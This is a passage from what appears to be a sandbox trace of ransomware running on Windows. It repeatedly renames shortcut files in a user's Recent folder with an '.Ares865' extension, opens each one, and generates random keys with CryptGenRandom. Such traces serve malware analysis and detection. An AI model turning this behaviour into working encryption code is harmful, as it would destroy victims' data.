dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.405] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1322) returned 1 [0093.405] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.406] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.406] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.407] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.407] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.407] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.409] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\My Pictures.lnk.Ares865") returned 60 [0093.409] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\My Pictures.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\my pictures.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\My Pictures.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\my pictures.lnk.ares865"), dwFlags=0x1) returned 1 [0093.410] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\My Pictures.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\my pictures.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.410] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1359) returned 1 [0093.410] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.411] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.411] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.411] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.412] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.412] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.420] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\My Videos.lnk.Ares865") returned 58 [0093.420] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\My Videos.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\my videos.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\My Videos.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\my videos.lnk.ares865"), dwFlags=0x1) returned 1 [0093.422] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\My Videos.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\my videos.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.422] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1337) returned 1 [0093.423] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.423] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.423] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.424] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.425] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.425] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.426] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\n6tOtL.lnk.Ares865") returned 55 [0093.426] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\n6tOtL.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\n6totl.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\n6tOtL.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\n6totl.lnk.ares865"), dwFlags=0x1) returned 1 [0093.427] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\n6tOtL.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\n6totl.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.427] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2427) returned 1 [0093.428] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.428] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.428] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.429] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.429] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.429] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.431] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\Njys.lnk.Ares865") returned 53 [0093.431] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\Njys.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\njys.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\Njys.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\njys.lnk.ares865"), dwFlags=0x1) returned 1 [0093.432] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\Njys.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\njys.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.432] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2401) returned 1 [0093.432] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.433] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.433] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.433] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.434] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.434] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.435] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\ObrmFTWwAUwqwhkp.lnk.Ares865") returned 65 [0093.435] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\ObrmFTWwAUwqwhkp.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\obrmftwwauwqwhkp.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\ObrmFTWwAUwqwhkp.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\obrmftwwauwqwhkp.lnk.ares865"), dwFlags=0x1) returned 1 [0093.436] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\ObrmFTWwAUwqwhkp.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\obrmftwwauwqwhkp.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.437] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3731) returned 1 [0093.437] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.437] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.438] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.441] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.442] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.442] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.443] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\oHiUSyU-2T4IUJrS.lnk.Ares865") returned 65 [0093.443] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\oHiUSyU-2T4IUJrS.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\ohiusyu-2t4iujrs.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\oHiUSyU-2T4IUJrS.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\ohiusyu-2t4iujrs.lnk.ares865"), dwFlags=0x1) returned 1 [0093.444] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\oHiUSyU-2T4IUJrS.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\ohiusyu-2t4iujrs.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.444] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2681) returned 1 [0093.444] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.445] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.445] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.445] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.446] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.446] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.447] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\oHJ1Rj4DsfsiVvokjGAk.lnk.Ares865") returned 69 [0093.447] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\oHJ1Rj4DsfsiVvokjGAk.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\ohj1rj4dsfsivvokjgak.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\oHJ1Rj4DsfsiVvokjGAk.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\ohj1rj4dsfsivvokjgak.lnk.ares865"), dwFlags=0x1) returned 1 [0093.448] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\oHJ1Rj4DsfsiVvokjGAk.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\ohj1rj4dsfsivvokjgak.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.449] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5186) returned 1 [0093.449] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.449] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.450] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.450] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.451] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.451] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.452] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\p373_seF.lnk.Ares865") returned 57 [0093.452] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\p373_seF.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\p373_sef.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\p373_seF.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\p373_sef.lnk.ares865"), dwFlags=0x1) returned 1 [0093.453] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\p373_seF.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\p373_sef.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.454] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5241) returned 1 [0093.454] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.455] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.455] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.455] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.456] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.456] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.457] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\pcHqC7yd_ gx.mkv.lnk.Ares865") returned 65 [0093.457] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\pcHqC7yd_ gx.mkv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\pchqc7yd_ gx.mkv.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\pcHqC7yd_ gx.mkv.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\pchqc7yd_ gx.mkv.lnk.ares865"), dwFlags=0x1) returned 1 [0093.458] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\pcHqC7yd_ gx.mkv.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\pchqc7yd_ gx.mkv.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.459] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=589) returned 1 [0093.459] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.460] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.460] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.460] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.460] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.461] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.462] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\PfNk15.lnk.Ares865") returned 55 [0093.462] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\PfNk15.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\pfnk15.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\PfNk15.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\pfnk15.lnk.ares865"), dwFlags=0x1) returned 1 [0093.463] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\PfNk15.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\pfnk15.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.463] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3621) returned 1 [0093.463] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.464] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.464] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.467] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.468] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.468] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.469] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\pkjInOLBW7.mkv.lnk.Ares865") returned 63 [0093.469] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\pkjInOLBW7.mkv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\pkjinolbw7.mkv.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\pkjInOLBW7.mkv.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\pkjinolbw7.mkv.lnk.ares865"), dwFlags=0x1) returned 1 [0093.470] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\pkjInOLBW7.mkv.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\pkjinolbw7.mkv.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.470] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6702) returned 1 [0093.471] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.471] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.471] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.472] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.472] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.472] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.474] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\pMuZXN8BFW243Rhs7kv_.lnk.Ares865") returned 69 [0093.474] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\pMuZXN8BFW243Rhs7kv_.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\pmuzxn8bfw243rhs7kv_.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\pMuZXN8BFW243Rhs7kv_.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\pmuzxn8bfw243rhs7kv_.lnk.ares865"), dwFlags=0x1) returned 1 [0093.475] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\pMuZXN8BFW243Rhs7kv_.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\pmuzxn8bfw243rhs7kv_.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.475] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6787) returned 1 [0093.475] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.476] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.476] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.476] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.477] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.477] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.478] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\puwDkZF9ud.lnk.Ares865") returned 59 [0093.478] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\puwDkZF9ud.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\puwdkzf9ud.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\puwDkZF9ud.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\puwdkzf9ud.lnk.ares865"), dwFlags=0x1) returned 1 [0093.479] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\puwDkZF9ud.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\puwdkzf9ud.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.480] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3683) returned 1 [0093.480] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.481] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.481] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.481] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.482] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.482] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.484] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\PVCkl1oeDfzyAB--.lnk.Ares865") returned 65 [0093.484] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\PVCkl1oeDfzyAB--.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\pvckl1oedfzyab--.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\PVCkl1oeDfzyAB--.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\pvckl1oedfzyab--.lnk.ares865"), dwFlags=0x1) returned 1 [0093.485] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS 